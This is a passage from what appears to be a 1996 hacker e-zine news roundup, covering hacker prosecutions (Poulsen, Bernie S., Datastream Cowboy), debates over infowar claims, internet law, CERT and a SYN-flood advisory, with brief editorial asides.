+friends to maintain his World Wide Web site. He even asked his
+probation officer whether it was OK to drive because most cars contain
+microchips.
+
+Living under government supervision apparently hasn't dampened the
+acerbic wit Poulsen displayed over the years.
+
+Prankster humor
+
+When authorities were tracking him, they found he'd kept photographs
+of himself, taken while burglarizing phone company offices, and that
+he'd created bogus identities in the names of favorite comic book
+characters.
+
+Today, you can click on Poulsen's web page (http://www.catalog.com/kevin) 
+and read his account of his troubles with the law. Until it was
+revised Friday, you could click on the highlighted words "my probation
+officer" -- and see the scary red face of Satan.
+
+But though he's still chafing at authority, Poulsen insists he's ready
+to be a law-abiding citizen.
+
+"The important thing to me," he said, "is just not wasting the next
+three years of my life." He said he's submitted nearly 70 job
+applications but has found work only with the political group, which
+he declined to identify.
+
+Poulsen, who earned his high school diploma behind bars, said he wants
+to get a college degree. But authorities vetoed his plans to study
+computer science while working part-time because they want him to put
+first priority on earning money for restitution.
+
+Poulsen's federal probation officer, Marc Stein, said office policy
+prevents him from commenting on the case. Poulsen's court-appointed
+attorney, Michael Brennan, also declined comment.
+
+Differing view
+
+But Assistant U.S. Attorney David Schindler partly disputed Poulsen's
+account.
+
+"Nobody wants to see Mr. Poulsen fail," said Schindler, who has
+prosecuted both Poulsen and Kevin Mitnick, another young man from the
+San Fernando Valley whose interest in computers and telephones became
+a passion that led to federal charges.
+
+Schindler said Stein is simply being prudent: "It would be irresponsible 
+for the probation office to permit him to have unfettered access to
+computers."
+
+Legal experts say there's precedent for restricting a hacker's access
+to computers, just as paroled felons may be ordered not to possess
+burglary tools or firearms. Still, some say it's going too far.
+
+"There are so many benign things one can do with a computer," said
+Charles Marson, a former attorney for the American Civil Liberties
+Union who handles high-tech cases in private practice. "If it were a
+typewriter and he pulled some scam with it or wrote a threatening
+note, would you condition his probation on not using a typewriter?"
+
+But Carey Heckman, co-director of the Law and Technology Policy Center
+at Stanford University, suggested another analogy: "Would you want to
+put an arsonist to work in a match factory?"
+
+Friends defend Poulsen.
+
+Over the years, Poulsen's friends and defense lawyers have argued that
+prosecutors exaggerated the threat he posed, either because law
+officers didn't understand the technology he was using or because his
+actions seemed to flaunt authority.
+
+Hacking is "sort of a youthful rebellion thing," Poulsen says
+now. "I'm far too old to get back into that stuff."
+
+But others who've followed Poulsen's career note that he had earlier
+chances to reform.
+
+He was first busted for hacking into university and government
+computers as a teen-ager. While an older accomplice went to jail,
+Poulsen was offered a job working with computers at SRI, the private
+think tank that does consulting for the Defense Department and other
+clients.
+
+There, Poulsen embarked on a double life: A legitimate programmer by
+day, he began breaking into Pacific Bell offices and hacking into
+phone company computers at night.
+
+When he learned FBI agents were on his trail, he used his skills to
+track their moves.
+
+Before going underground in 1989, he also obtained records of secret
+wiretaps from unrelated investigations. Though Poulsen said he never
+tipped off the targets, authorities said they had to take steps to
+ensure those cases weren't compromised.
+
+According to Schindler, the probation office will consider Poulsen's
+requests to use computers "on a case-by-case basis."
+
+[=-------------------------------------------------------------------------=]
+
+[* Blurb on Bernie's release follows this article. *]
+
+title: Computer Hacker Severely Beaten after Criticizing Prison Conditions
+       Target of Campaign by U.S. Secret Service
+
+A convicted hacker, in prison for nothing more than possession of
+electronic parts easily obtainable at any Radio Shack, has been
+savagely beaten after being transferred to a maximum security prison
+as punishment for speaking out publicly about prison conditions.
+Ed Cummings, recently published in Wired and Internet Underground, as
+well as a correspondent for WBAI-FM in New York and 2600 Magazine,
+has been the focus of an increasingly ugly campaign of harrassment
+and terror from the authorities. At the time of this writing, Cummings
+is locked in the infectious diseases ward at Lehigh County prison in
+Allentown, Pennsylvania, unable to obtain the proper medical treatment
+for the severe injuries he has suffered.
+
+The Ed Cummings case has been widely publicized in the computer hacker
+community over the past 18 months. In March of 1995, in what can only
+be described as a bizarre application of justice, Cummings (whose pen
+name is "Bernie S.") was targetted and imprisoned by the United States
+Secret Service for mere possession of technology that could be used to
+make free phone calls. Although the prosecution agreed there was no
+unauthorized access, no victims, no fraud, and no costs associated with
+the case, Cummings was imprisoned under a little known attachment to the
+Digital Telephony bill allowing individuals to be charged in this fashion.
+Cummings was portrayed by the Secret Service as a potential terrorist
+because of some of the books found in his library.
+
+A year and a half later, Cummings is still in prison, despite the
+fact that he became eligible for parole three months ago. But things have
+now taken a sudden violent turn for the worse. As apparent retribution for
+Cummings' continued outspokenness against the daily harrassment and
+numerous injustices that he has faced, he was transferred on Friday
+to Lehigh County Prison, a dangerous maximum security facility. Being
+placed in this facility was in direct opposition to his sentencing
+order. The reason given by the prison: "protective custody".
+
+A day later, Cummings was nearly killed by a dangerous inmate for not
+getting off the phone fast enough. By the time the prison guards stopped
+the attack, Cummings had been kicked in the face so many times that he
+lost his front teeth and had his jaw shattered. His arm, which he tried
+to use to shield his face, was also severely injured. It is expected that
+his mouth will be wired shut for up to three months. Effectively,
+Cummings has now been silenced at last.
+
+>From the start of this ordeal, Cummings has always maintained his
+composure and confidence that one day the injustice of his
+imprisonment will be realized. He was a weekly contributor to a
+radio talk show in New York where he not only updated listeners on
+his experiences, but answered their questions about technology.
+People from as far away as Bosnia and China wrote to him, having
+heard about his story over the Internet.
+
+Now we are left to piece these events together and to find those
+responsible for what are now criminal actions against him. We are
+demanding answers to these questions: Why was Cummings transferred
+for no apparent reason from a minimum security facility to a very
+dangerous prison? Why has he been removed from the hospital immediately
+after surgery and placed in the infectious diseases ward of the very
+same prison, receiving barely any desperately needed medical
+attention? Why was virtually every moment of Cummings' prison stay a
+continuous episode of harrassment, where he was severely punished for
+such crimes as receiving a fax (without his knowledge) or having too
+much reading material? Why did the Secret Service do everything in
+their power to ruin Ed Cummings' life?
+
+Had these events occurred elsewhere in the world, we would be quick
+to condemn them as barbaric and obscene. The fact that such things are
+taking place in our own back yards should not blind us to the fact that
+they are just as unacceptable.
+
+Lehigh County Prison will be the site of several protest actions as will
+the Philadelphia office of the United States Secret Service. For more
+information on this, email protest@2600.com or call our office at
+(516) 751-2600.
+
+9/4/96
+
+[=-------------------------------------------------------------------------=]
+
+title: Bernie S. Released!
+
+As of Friday, September 13th, Bernie S. was released from prison on
+an unprecedented furlough. He will have to report to probation and
+he still has major medical problems as a result of his extended tour
+of the Pennsylvania prison system. But the important thing is that
+he is out and that this horrible ordeal has finally begun to end.
+
+We thank all of you who took an interest in this case. We believe
+it was your support and the pressure you put on the authorities that
+finally made things change. Thanks again and never forget the power
+you have.
+
+emmanuel@2600.com
+www.2600.com
+
+[=-------------------------------------------------------------------------=]
+
+title: <The Squidge Busted>
+
+ENGLAND:
+
+The Squidge was arrested at his home yesterday under the Computer Misuse
+Act. A long standing member of the US group the *Guild, Squidge was silent
+today after being released but it appears no formal charges will be made
+until further interviews have taken place.
+
+Included in the arrest were the confiscation of his computer equipment
+including two Linux boxes and a Sun Sparc. A number of items described as
+'telecommunications devices' were also seized as evidence.
+
+Following the rumours of ColdFire's recent re-arrest for cellular fraud
+this could mean a new crackdown on hacking and phreaking by the UK
+authorities. If this is true, it could spell the end for a particularly
+open period in h/p history when notable figures have been willing to
+appear more in public.
+
+We will attempt to release more information as it becomes available.
+
+(not posted by Squidge)
+
+--
+    Brought to you by The NeXus.....
+
+[* Good luck goes out to Squidge.. we are hoping for the best. *]
+
+[=-------------------------------------------------------------------------=]
+
+title: School Hires Student to Hack Into Computers
+source: The Sun Herald - 22 August 1996
+
+     Palisades Park, NJ - When in trouble, call an expert.
+
+     Students at Palisades Park's high school needed their
+transcripts to send off to colleges.  But they were in the computer
+and no one who knew the password could be reached.  So the school
+hired a 16-year-old hacker to break in.
+
+     "They found this student who apparently was a whiz, and,
+apparently, was able to go in and unlock the password," School Board
+attorney Joseph R. Mariniello said.
+
+     Superintendent George Fasciano was forced to explain to the
+School Board on Monday the $875 bill for the services of Matthew
+Fielder.
+
+[* He should have charged more :) *]
+
+[=-------------------------------------------------------------------------=]
+
+title: Paranoia and Brit Hackers Fuel Infowar Craze in Spy Agencies
+author: unknown
+source: Crypt Newsletter 38 
+
+Electronic doom will soon be visited on U.S. computer networks by
+information warriors, hackers, pannational groups of computer-wielding
+religious extremists, possible agents of Libya and Iran, international
+thugs and money-mad Internet savvy thieves.
+
+John Deutch, director of Central Intelligence, testified to the
+truth of the matter, so it must be graven in stone. In a long statement
+composed in the august tone of the Cold Warrior, Deutch said to the
+Senate Permanent Subcommittee on Investigations on June 25, "My greatest
+concern is that hackers, terrorist organizations, or other nations might
+use information warfare techniques" to disrupt the national
+infrastructure.
+
+"Virtually any 'bad actor' can acquire the hardware and software
+needed to attack some of our critical information-based infrastructures.
+Hacker tools are readily available on the Internet, and hackers
+themselves are a source of expertise for any nation or foreign
+terrorist organization that is interested in developing an information
+warfare capability. In fact, hackers, with or without their full
+knowledge, may be supplying advice and expertise to rogue states such
+as Iran and Libya."
+
+In one sentence, the head of the CIA cast hackers -- from those more
+expert than Kevin Mitnick to AOLHell-wielding idiots calling an America
+On-Line overseas account -- as pawns of perennial international bogeymen,
+Libya and Iran.
+
+Scrutiny of the evidence that led to this conclusion was not possible
+since it was classified, according to Deutch.
+
+" . . . we have [classified] evidence that a number of countries
+around the world are developing the doctrine, strategies, and tools
+to conduct information attacks," said Deutch.
+
+Catching glimpses of shadowy enemies at every turn, Deutch
+characterized them as operating from the deep cover of classified
+programs in pariah states.  Truck bombs aimed at the telephone
+company, electronic assaults by "paid hackers" are likely to
+be part of the arsenal of anyone from the Lebanese Hezbollah
+to "nameless . . . cells of international terrorists such as those
+who attacked the World Trade Center."
+
+Quite interestingly, a Minority Staff Report entitled "Security and
+Cyberspace" and presented to the subcommittee around the same time as
+Deutch's statement, presented a different picture.  In its attempt to
+raise the alarm over hacker assaults on the U.S., it inadvertently
+portrayed the intelligence community responsible for appraising the
+threat as hidebound stumblebums, Cold Warriors resistant to change and
+ignorant or indifferent to the technology of computer networks and their
+misuse.
+
+Written by Congressional staff investigators Dan Gelber and Jim Christy,
+the report quotes an unnamed member of the intelligence  community likening
+threat assessment in the area to "a toddler soccer game, where everyone
+just runs around trying to kick the ball somewhere."  Further, assessment
+of the threat posed by information warriors was "not presently a priority
+of our nation's intelligence and enforcement communities."
+
+The report becomes more comical with briefings from intelligence
+agencies said to be claiming that the threat of hackers and information
+warfare is "substantial" but completely unable to provide a concrete
+assessment of the threat because few or no personnel were working on
+the subject under investigation. "One agency assembled [ten] individuals
+for the Staff briefing, but ultimately admitted that only one person was
+actually working 'full time' on intelligence collection and threat
+analysis," write Gelber and Christy.
+
+The CIA is one example.
+
+"Central Intelligence Agency . . . staffs an 'Information Warfare
+Center'; however, at the time of [the] briefing, barely a handful
+of persons were dedicated to collection and on [sic] defensive
+information warfare," comment the authors.
+
+" . . . at no time was any agency able to present a national threat
+assessment of the risk posed to our information infrastructure," they
+continue. Briefings on the subject, if any and at any level of
+classification, "consisted of extremely limited anecdotal information."
+
+Oh no, John, say it ain't so!
+
+The minority report continues to paint a picture of intelligence agencies
+that have glommed onto the magic words "information warfare" and
+"hackers" as mystical totems, grafting the subjects onto "pre-existing"
+offices or new "working groups." However, the operations are based only
+on labels. "Very little prioritization" has been done, there are
+few analysts working on the subjects in question.
+
+Another "very senior intelligence officer for science and technology"
+is quoted claiming "it will probably take the intelligence community
+years to break the traditional paradigms, and re-focus resources"
+in the area.
+
+Restated, intelligence director Deutch pronounced in June there was
+classified evidence that hackers are in league with Libya and Iran and
+that countries around the world are plotting plots to attack the U.S.
+through information warfare.  But the classified data is and was, at best,
+anecdotal gossip -- hearsay, bullshit -- assembled by perhaps a handful of
+individuals working haphazardly inside the labyrinth of the intelligence
+community. There is no real threat assessment to back up the Deutch
+claims.  Can anyone say _bomber gap_?
+
+The lack of solid evidence for any of the claims made by the intelligence
+community has created an unusual stage on which two British hackers,
+Datastream Cowboy and Kuji, were made the dog and pony in a ridiculous
+show to demonstrate the threat of information warfare to members of
+Congress.  Because of a break-in at an Air Force facility in Rome, NY,
+in 1994, booth hackers were made the stars of two Government Accounting
+Office reports on network intrusions in the Department of Defense earlier
+this year.  The comings and goings of Datastream Cowboy also constitute the
+meat of Gelber and Christy's minority staff report from the Subcommittee on
+Investigations.
+
+Before delving into it in detail, it's interesting to read what a
+British newspaper published about Datastream Cowboy, a sixteen year-old,
+about a year before he was made the poster boy for information
+warfare and international hacking conspiracies in front of Congress.
+
+In a brief article, blessedly so in contrast to the reams of propaganda
+published on the incident for Congress, the July 5 1995 edition of The
+Independent wrote, "[Datastream Cowboy] appeared before Bow Street
+magistrates yesterday charged with unlawfully gaining access to a series
+of American defense computers. Richard Pryce, who was 16 at the time of
+the alleged offences, is accused of accessing key US Air Force systems
+and a network owned by Lockheed, the missile and aircraft manufacturers."
+
+Pryce, a resident of a northwest suburb of London did not enter a plea
+on any of 12 charges levied against him under the British
+Computer Misuse Act.  He was arrested on May 12, 1994, by New Scotland
+Yard as a result of work by the U.S. Air Force Office of Special
+Investigations.  The Times of London reported when police came for
+Pryce, they found him at his PC on the third floor of his family's house.
+Knowing he was about to be arrested, he "curled up on the floor and cried."
+
+In Gelber and Christy's staff report, the tracking of Pryce, and to a
+lesser extent a collaborator called Kuji -- real name Mathew Bevan, is
+retold as an eight page appendix entitled "The Case Study: Rome
+Laboratory, Griffiss Air Force Base, NY Intrusion."
+
+Pryce's entry into Air Force computers was noticed on March 28, 1994,
+when personnel discovered a sniffer program he had installed on one
+of the Air Force systems in Rome.  The Defense Information System
+Agency (DISA) was notified.  DISA subsequently called the Air
+Force Office of Special Investigations (AFOSI) at the Air Force
+Information Warfare Center in San Antonio, Texas. AFOSI then
+sent a team to Rome to appraise the break-in, secure the system and
+trace those responsible.  During the process, the AFOSI team discovered
+Datastream Cowboy had entered the Rome Air Force computers for the
+first time on March 25, according to the report.  Passwords had been
+compromised, electronic mail read and deleted and unclassified
+"battlefield simulation" data copied off the facility. The
+Rome network was also used as a staging area for penetration of other
+systems on the Internet.
+
+AFOSI investigators initially traced the break-in back one step to
+the New York City provider, Mindvox. According to the Congressional
+report, this put the NYC provider under suspicion because "newspaper
+articles" said Mindvox's computer security was furnished by two "former
+Legion of Doom members." "The Legion of Doom is a loose-knit computer
+hacker group which had several members convicted for intrusions into
+corporate telephone switches in 1990 and 1991," wrote Gelber and Christy.
+
+AFOSI then got permission to begin monitoring -- the equivalent of
+wiretapping -- all communications on the Air Force network.  Limited
+observation of other Internet providers being used during the break-in
+was conducted from the Rome facilities.  Monitoring told the investigators
+the handles of hackers involved in the Rome break-in were Datastream
+Cowboy and Kuji.
+
+Since the monitoring was of limited value in determining the whereabouts
+of Datastream Cowboy and Kuji, AFOSI resorted to "their human intelligence
+network of informants, i.e., stool pigeons, that 'surf the Internet.'
+Gossip from one AFOSI 'Net stoolie uncovered that Datastream Cowboy was from
+Britain. The anonymous source said he had e-mail correspondence with
+Datastream Cowboy in which the hacker said he was a 16-year old living in
+England who enjoyed penetrating ".MIL" systems. Datastream Cowboy also
+apparently ran a bulletin board system and gave the telephone number to the
+AFOSI source.
+
+The Air Force team contacted New Scotland Yard and the British law
+enforcement agency identified the residence, the home of Richard
+Pryce, which corresponded to Datastream Cowboy's system phone number.
+English authorities began observing Pryce's phone calls and noticed
+he was making fraudulent use of British Telecom.  In addition,
+whenever intrusions at the Air Force network in Rome occurred, Pryce's
+number was seen to be making illegal calls out of Britain.
+
+Pryce travelled everywhere on the Internet, going through South America,
+multiple countries in Europe and Mexico, occasionally entering the Rome
+network.  From Air Force computers, he would enter systems at Jet
+Propulsion Laboratory in Pasadena, California, and the Goddard Space
+Flight Center in Greenbelt, Maryland. Since Pryce was capturing the logins
+and passwords of the Air Force networks in Rome, he was then able to
+get into the home systems of Rome network users, defense contractors
+like Lockheed.
+
+By mid-April of 1994 the Air Force was monitoring other systems being
+used by the British hackers. On the 14th of the month, Kuji logged on
+to the Goddard Space Center from a system in Latvia and copied data
+from it to the Baltic country.  According to Gelber's report, the
+AFOSI investigators assumed the worst, that it was a sign that someone
+in an eastern European country was making a grab for sensitive
+information.  They broke the connection but not before Kuji had
+copied files off the Goddard system.  As it turned out, the Latvian
+computer was just another system the British hackers were using as
+a stepping stone; Pryce had also used it to cover his tracks when
+penetrating networks at Wright-Patterson Air Force Base in Ohio, via
+an intermediate system in Seattle, cyberspace.com.
+
+The next day, Kuji was again observed trying to probe various
+systems at NATO in Brussels and The Hague as well as Wright-Patterson.
+On the 19th, Pryce successfully returned to NATO systems in The
+Hague through Mindvox.  The point Gelber and Christy seem to be trying
+to make is that Kuji, a 21-year old, was coaching Pryce during some
+of his attacks on various systems.
+
+By this point, New Scotland Yard had a search warrant for Pryce
+with the plan being to swoop down on him the next time he accessed
+the Air Force network in Rome.
+
+In April, Pryce penetrated a system on the Korean peninsula and copied
+material off a facility called the Korean Atomic Research Institute
+to an Air Force computer in Rome. At the time, the investigators had
+no idea whether the system was in North or South Korea.  The impression
+created is one of hysteria and confusion at Rome. There was fear that the
+system, if in North Korea, would trigger an international incident, with
+the hack interpreted as an "aggressive act of war." The system turned
+out to be in South Korea.
+
+During the Korean break-in, New Scotland Yard could have intervened and
+arrested Pryce.  However, for unknown reasons, the agency did not.  Those
+with good memories may recall mainstream news reports concerning Pryce's
+hack, which was cast as an entry into sensitive North Korean networks.
+
+It's worth noting that while the story was portrayed as the work of
+an anonymous hacker, both the U.S. government and New Scotland Yard knew
+who the perpetrator was.  Further, according to Gelber's report English
+authorities already had a search warrant for Pryce's house.
+
+Finally, on May 12 British authorities pounced.  Pryce was arrested
+and his residence searched.  He crumbled, according to the Times of
+London, and began to cry.  Gelber and Christy write that Pryce promptly
+admitted to the Air Force break-ins as well as others.  Pryce
+confessed he had copied a large program that used artificial intelligence
+to construct theoretical Air Orders of Battle from an Air Force computer
+to Mindvox and left it there because of its great size, 3-4 megabytes.
+Pryce paid for his Internet service with a fraudulent credit card number.
+At the time, the investigators were unable to find out the name and
+whereabouts of Kuji. A lead to an Australian underground bulletin board
+system failed to pan out.
+
+On June 23 of this year, Reuters reported that Kuji -- 21-year-old Mathew
+Bevan -- a computer technician, had been arrested and charged in
+connection with the 1994 Air Force break-ins in Rome.
+
+Rocker Tom Petty sang that even the losers get lucky some time.  He
+wasn't thinking of British computer hackers but no better words could be
+used to describe the two Englishmen and a two year old chain of events that
+led to fame as international computer terrorists in front of Congress
+at the beginning of the summer of 1996.
+
+Lacking much evidence for the case of conspiratorial computer-waged
+campaigns of terror and chaos against the U.S., the makers of Congressional
+reports resorted to telling the same story over and over, three
+times in the space of the hearings on the subject. One envisions U.S.
+Congressmen too stupid or apathetic to complain, "Hey, didn't we get that
+yesterday, and the day before?" Pryce and Bevan appeared in "Security in
+Cyberspace" and twice in Government Accounting Office reports AIMD-96-84
+and T-AIMD96-92. Jim Christy, the co-author of "Security in Cyberspace"
+and the Air Force Office of Special Investigations' source for the Pryce
+case supplied the same tale for Jack Brock, author of the GAO reports.
+Brock writes, ". . . Air Force officials told us that at least one of
+the hackers may have been working for a foreign country interested in
+obtaining military research data or areas in which the Air Force was
+conducting advanced research."  It was, apparently, more wishful
+thinking.
+
+
+Notes:
+
+The FAS Web site also features an easy to use search engine which can
+be used to pull up the Congressional testimony on hackers and
+network intrusion.  These example key words are effective: "Jim
+Christy," "Datastream Cowboy".
+
+[=-------------------------------------------------------------------------=]
+
+title: Hackers Find Cheap Scotland Yard Phone Connection
+source: Reuters/Variety
+
+Monday August 5 12:01 AM EDT
+
+LONDON (Reuter) - Computer hackers broke into a security system at
+Scotland Yard, London's metropolitan police headquarters, to make
+international calls at police expense, police said Sunday.
+
+A police spokesman would not confirm a report in the Times newspaper
+that the calls totaled one million pounds ($1.5 million). He said
+the main computer network remained secure.
+
+"There is no question of any police information being accessed," the
+spokesman said. "This was an incident which was investigated by our
+fraud squad and by AT&T investigators in the U.S."
+
+AT&T Corp investigators were involved because most of the calls were
+to the United States, the Times said.
+
+According to The Times, the hackers made use of a system called PBX
+call forwarding that lets employees to make business calls from home
+at their employer's expense.
+
+[=-------------------------------------------------------------------------=]
+
+title: U.S. Official Warns OF "Electronic Pearl Harbor"
+source: BNA Daily Report - 17 Jul 96
+
+Deputy U.S. Attorney General Jamie Gorelick told a Senate
+subcommittee last week that the possibility of "an electronic Pearl
+Harbor" is a very real danger for the U.S.  She noted in her
+testimony that the U.S. information infrastructure is a hybrid
+public/private network, and warned that electronic attacks "can
+disable or disrupt the provision of services just as readily as --
+if not more than -- a well-placed bomb."  On July 15 the Clinton
+Administration called for a President's Commission on Critical
+Infrastructure Protection, with the mandate to identify the nature
+of threats to U.S. infrastructure, both electronic and physical, and
+to work with the private sector in devising a strategy for
+protecting this infrastructure.  At an earlier hearing, subcommittee
+members were told that about 250,000 intrusions into Defense
+Department computer systems are attempted each year, with about a
+65% success rate.
+
+[=-------------------------------------------------------------------------=]
+
+title: Suit Challenges State's Restraint of the Internet Via AP
+author: Jared Sandberg
+source: The Wall Street Journal
+
+Can the state of Georgia hold sway over the global Internet?
+
+A federal lawsuit filed against the state Tuesday by the American
+Civil Liberties Union should eventually answer that question. The
+suit, filed in federal district court in Georgia, challenges a new
+Georgia law that makes it illegal in some instances to communicate
+anonymously on the Internet and to use trademarks and logos without
+permission.
+
+The ACLU, joined by 13 plaintiffs including an array of public-
+interest groups, contends that the Georgia law is "unconstitutionally
+vague" and that its restraints on using corporate logos and trade
+names are "impermissibly chilling constitutionally protected
+expression." The plaintiffs also argue that the Georgia law, which
+imposes a penalty of up to 12 months in jail and $1,000 in fines,
+illegally tries to impose state restrictions on interstate commerce, a
+right reserved for Congress.
+
+The legal challenge is one of the first major assaults on state laws
+that seek to rein in the Internet, despite its global reach and
+audience. Since the beginning of 1995, 11 state legislatures have
+passed Internet statutes and nine others have considered taking
+action.
+
+Connecticut passed a law last year that makes it a crime to send an
+electronic-mail message "with intent to harass, annoy or alarm another
+person" -- despite the Internet's hallowed tradition of "flaming"
+users with messages designed to do just that. Virginia enacted a bill
+this year making it illegal for a state employee -- including
+professors who supposedly have academic freedom on state campuses --
+to use state-owned computers to get access to sexually explicit
+material. New York state has tried to resurrect prohibitions on
+"indecent material" that were struck down as unconstitutional by a
+federal appeals panel ruling on the federal Communications Decency Act
+three months ago.
+
+Most Internet laws target child pornographers and stalkers. Opponents
+argue the well-intended efforts could nonetheless chill free speech
+and the development of electronic commerce. They maintain that the
+Internet, which reaches into more than 150 countries, shouldn't be
+governed by state laws that could result in hundreds of different, and
+often conflicting, regulations.
+
+"We've got to nip this in the bud and have a court declare that states
+can't regulate the Internet because it would damage interstate
+commerce," says Ann Beeson, staff attorney for the ACLU. "Even though
+it's a Georgia statute, it unconstitutionally restricts the ability of
+anybody on the Internet to use a pseudonym or to link to a Web page
+that contains a trade name or logo. It is unconstitutional on its
+face."
+
+Esther Dyson, president of high-tech publisher EDventure Holdings
+Inc. and chairwoman of the Electronic Frontier Foundation, a high-tech
+civil liberties organization that is a co-plaintiff in the lawsuit,
+calls the Georgia law "brain-damaged and unenforceable" and adds: "How
+are they going to stop people from using fake names? Anonymity
+shouldn't be a crime. Committing crimes should be a crime."
+
+But Don Parsons, the Republican state representative who sponsored the
+Georgia bill, countered that the law is a necessary weapon to combat
+fraud, forgery and other on-line misdeeds. The groups that oppose it,
+he says, "want to present (the Internet) as something magical, as
+something above and beyond political boundaries." It is none of these
+things, he adds.
+
+Nor does the Georgia law seek to ban all anonymity, Mr. Parsons says;
+instead, it targets people who "fraudulently misrepresent their (Web)
+site as that of another organization." Misrepresenting on-line medical
+information, for example, could cause serious harm to an unsuspecting
+user, he says.
+
+But Mr. Parsons's critics, including a rival state lawmaker,
+Rep. Mitchell Kaye, say political reprisal lies behind the new
+law. They say Mr. Parsons and his political allies were upset by the
+Web site run by Mr. Kaye, which displayed the state seal on its
+opening page and provided voting records and sometimes harsh political
+commentary. Mr. Kaye asserts that his Web site prompted the new law's
+attack on logos and trademarks that are used without explicit
+permission.
+
+"We've chosen to regulate free speech in the same manner that
+communist China, North Korea, Cuba and Singapore have," Mr. Kaye
+says. "Legislators' lack of understanding has turned to fear. It has
+given Georgia a black eye and sent a message to the world -- that we
+don't understand and are inhospitable to technology."
+
+Mr. Parsons denies that the political Web site was the primary reason
+for his sponsorship of the new statute.
+
+The very local dispute underscores the difficulty of trying to
+legislate behavior on the Internet. "It creates chaos because I don't
+know what rules are going to apply to me," says Lewis Clayton, a
+partner at New York law firm Paul, Weiss, Rifkind, Wharton &
+Garrison. "Whose laws are going to govern commercial transactions? You
+don't want to have every different state with the ability to regulate
+what is national or international commerce."
+
+In the case of the Georgia statute, while its backers say it isn't a
+blanket ban of anonymity, opponents fear differing interpretations of
+the law could lead to the prosecution of AIDS patients and childabuse
+survivors who use anonymity to ensure privacy when they convene on the
+Internet.
+
+"Being able to access these resources anonymously really is crucial,"
+says Jeffery Graham, executive director of the AIDS Survival Project,
+an Atlanta service that joined the ACLU in the lawsuit. His group's
+members "live in small communities," he says, and if their identities
+were known, "they would definitely suffer from stigmas and reprisals."
+
+[=-------------------------------------------------------------------------=]
+
+title: U.S. Government Plans Computer Emergency Response Team
+source: Chronicle of Higher Education - 5 Jul 96
+
+The federal government is planning a centralized emergency response team to
+respond to attacks on the U.S. information infrastructure.  The Computer
+Emergency Response Team at Carnegie Mellon University, which is financed
+through the Defense Department, will play a major role in developing the new
+interagency group, which will handle security concerns related to the
+Internet, the telephone system, electronic banking systems, and the
+computerized systems that operate the country's oil pipelines and electrical
+power grids. 
+
+[=-------------------------------------------------------------------------=]
+
+title: Hackers $50K challenge to break Net security system
+source: Online Business Today
+
+World Star Holdings in Winnipeg, Canada is looking for
+trouble. If they find it, they're willing to pay $50,000 to the
+first person who can break their security system. The
+company has issued an open invitation to take the "World
+Star Cybertest '96: The Ultimate Internet Security Challenge,"
+in order to demonstrate the Company's Internet security
+system.
+
+Personal email challenges have been sent to high profile
+names such as Bill Gates, Ken Rowe at the National Center
+for Super Computing, Dr. Paul Penfield, Department of
+Computer Science at the M.I.T. School of Engineering and
+researchers Drew Dean and Dean Wallach of Princeton
+University.
+
+[* Challenging Bill Gates to hack a security system is like
+   challenging Voyager to a knitting contest. *]
+
+OBT's paid subscription newsletter Online Business
+Consultant has recently quoted the Princeton team in several
+Java security reports including "Deadly Black Widow On The
+Web: Her Name is JAVA," "Java Black Widows---Sun
+Declares War," Be Afraid. Be Very Afraid" and "The
+Business Assassin."  To read these reports go to Home Page
+Press http://www.hpp.com and scroll down the front page.
+
+Brian Greenberg, President of World Star said, "I personally
+signed, sealed and emailed the invitations and am very
+anxious to see some of the individuals respond to the
+challenge. I am confident that our system is, at this time, the
+most secure in cyberspace."
+
+World Star Holdings, Ltd., is a provider of interactive
+"transactable" Internet services and Internet security
+technology which Greenberg claims has been proven
+impenetrable. The Company launched its online contest
+offering more than $50,000 in cash and prizes to the first
+person able to break its security system.
+
+According to the test's scenario hackers are enticed into a
+virtual bank interior in search of a vault. The challenge is to
+unlock it and find a list of prizes with inventory numbers and
+a hidden "cyberkey" number.  OBT staff used Home Page
+Press's Go.Fetch (beta) personal agent software to retrieve the
+World Star site and was returned only five pages.
+
+If you're successful, call World Star at 204-943-2256.  Get to
+it hackers.  Bust into World Star at http://205.200.247.10 to
+get the cash!
+
+[=-------------------------------------------------------------------------=]
+
+title: Criminal cult begins PGP crack attempt
+from: grady@netcom.com (Grady Ward)
+
+The Special Master has informed me that Madame Kobrin has asked
+her to retain a PC expert to attempt to "crack" a series of
+pgp-encrypted multi-megabyte files that were seized along with
+more than a compressed gigabyte of other material from my safety
+deposit box.
+
+Ironically, they phoned to ask for assistance in supplying them
+with a prototype "crack" program that they could use in iterating
+and permuting possibilities. I did supply them a good core
+pgpcrack source that can search several tens of thousands of
+possible key phrases a seconds; I also suggested that they should
+at least be using a P6-200 workstation or better to make the
+search more efficient.
+
+The undercurrent is that this fresh hysterical attempt to "get"
+something on me coupled with the daily settlement pleas reflects
+the hopelessness of the litigation position of the criminal cult.
+
+It looks like the criminal cult has cast the die to ensure that
+the RTC vs Ward case is fought out to the bitter end.  Which I
+modestly predict will be a devastating, humiliating defeat for
+them from a pauper pro per.
+
+I have given them a final settlement offer that they can leave or
+take. Actually they have a window of opportunity now to drop the
+suit since my counterclaims have been dismissed (although Judge
+Whyte invited me to re-file a new counterclaim motion on more
+legally sufficiant basis).
+
+I think Keith and I have found a successful counter-strategy to
+the cult's system of litigation harassment.
+
+Meanwhile, I could use some help from veteran a.r.s'ers. I need
+any copy you have of the Cease and Desist letter that you may
+have received last year from Eliot Abelson quondam criminal cult
+attorney and Eugene Martin Ingram spokespiece.
+
+
+Physical mail:
+
+Grady Ward
+3449 Martha Ct.
+Arcata, CA  95521-4884
+
+JP's BMPs or fax-images to:
+
+grady@northcoast.com
+
+Thanks.
+
+Grady Ward
+
+Ps. I really do need all of your help and good wishes after all.
+Thanks for all of you keeping the net a safe place to insult
+kook kults.
+
+[=-------------------------------------------------------------------------=]
+
+title: Hackers Bombard Internet
+author: Dinah Zeiger
+source: Denver Post
+
+9/21/96
+
+        Computer hackers have figured out a new way to tie the Internet
+in knots - flooding network computers with messages so other users can't
+access them.
+        Late Thursday, the federally funded Computer Emergency Response
+Team at Carnegie-Mellon University in Pittsburgh issued an advisory to
+Internet service providers, universities and governments detailing the
+nature of the attacks, which have spread to about 15 Internet services
+over the past six weeks. Three were reported this week.
+        Thus far, none of the Colorado-based Internet providers contacted
+has been victimized, but all are on alert and preparing defenses.
+        The worst of it is that there is no rock-solid defense, because
+the attacks are launched using the same rules - or protocols- that allow
+Internet computers to establish a connection.
+        The best the Computer Emergency Response Team can do so far is to
+suggest modifications that can reduce the likelihood that a site will be
+targeted.
+        In essence, hackers bombard their victim sites with hundreds of
+messages from randomly generated, fictitious addresses. The targeted
+computers overload when they try to establish a connection with the false
+sites. It doesn't damage the network, it just paralyzes it.
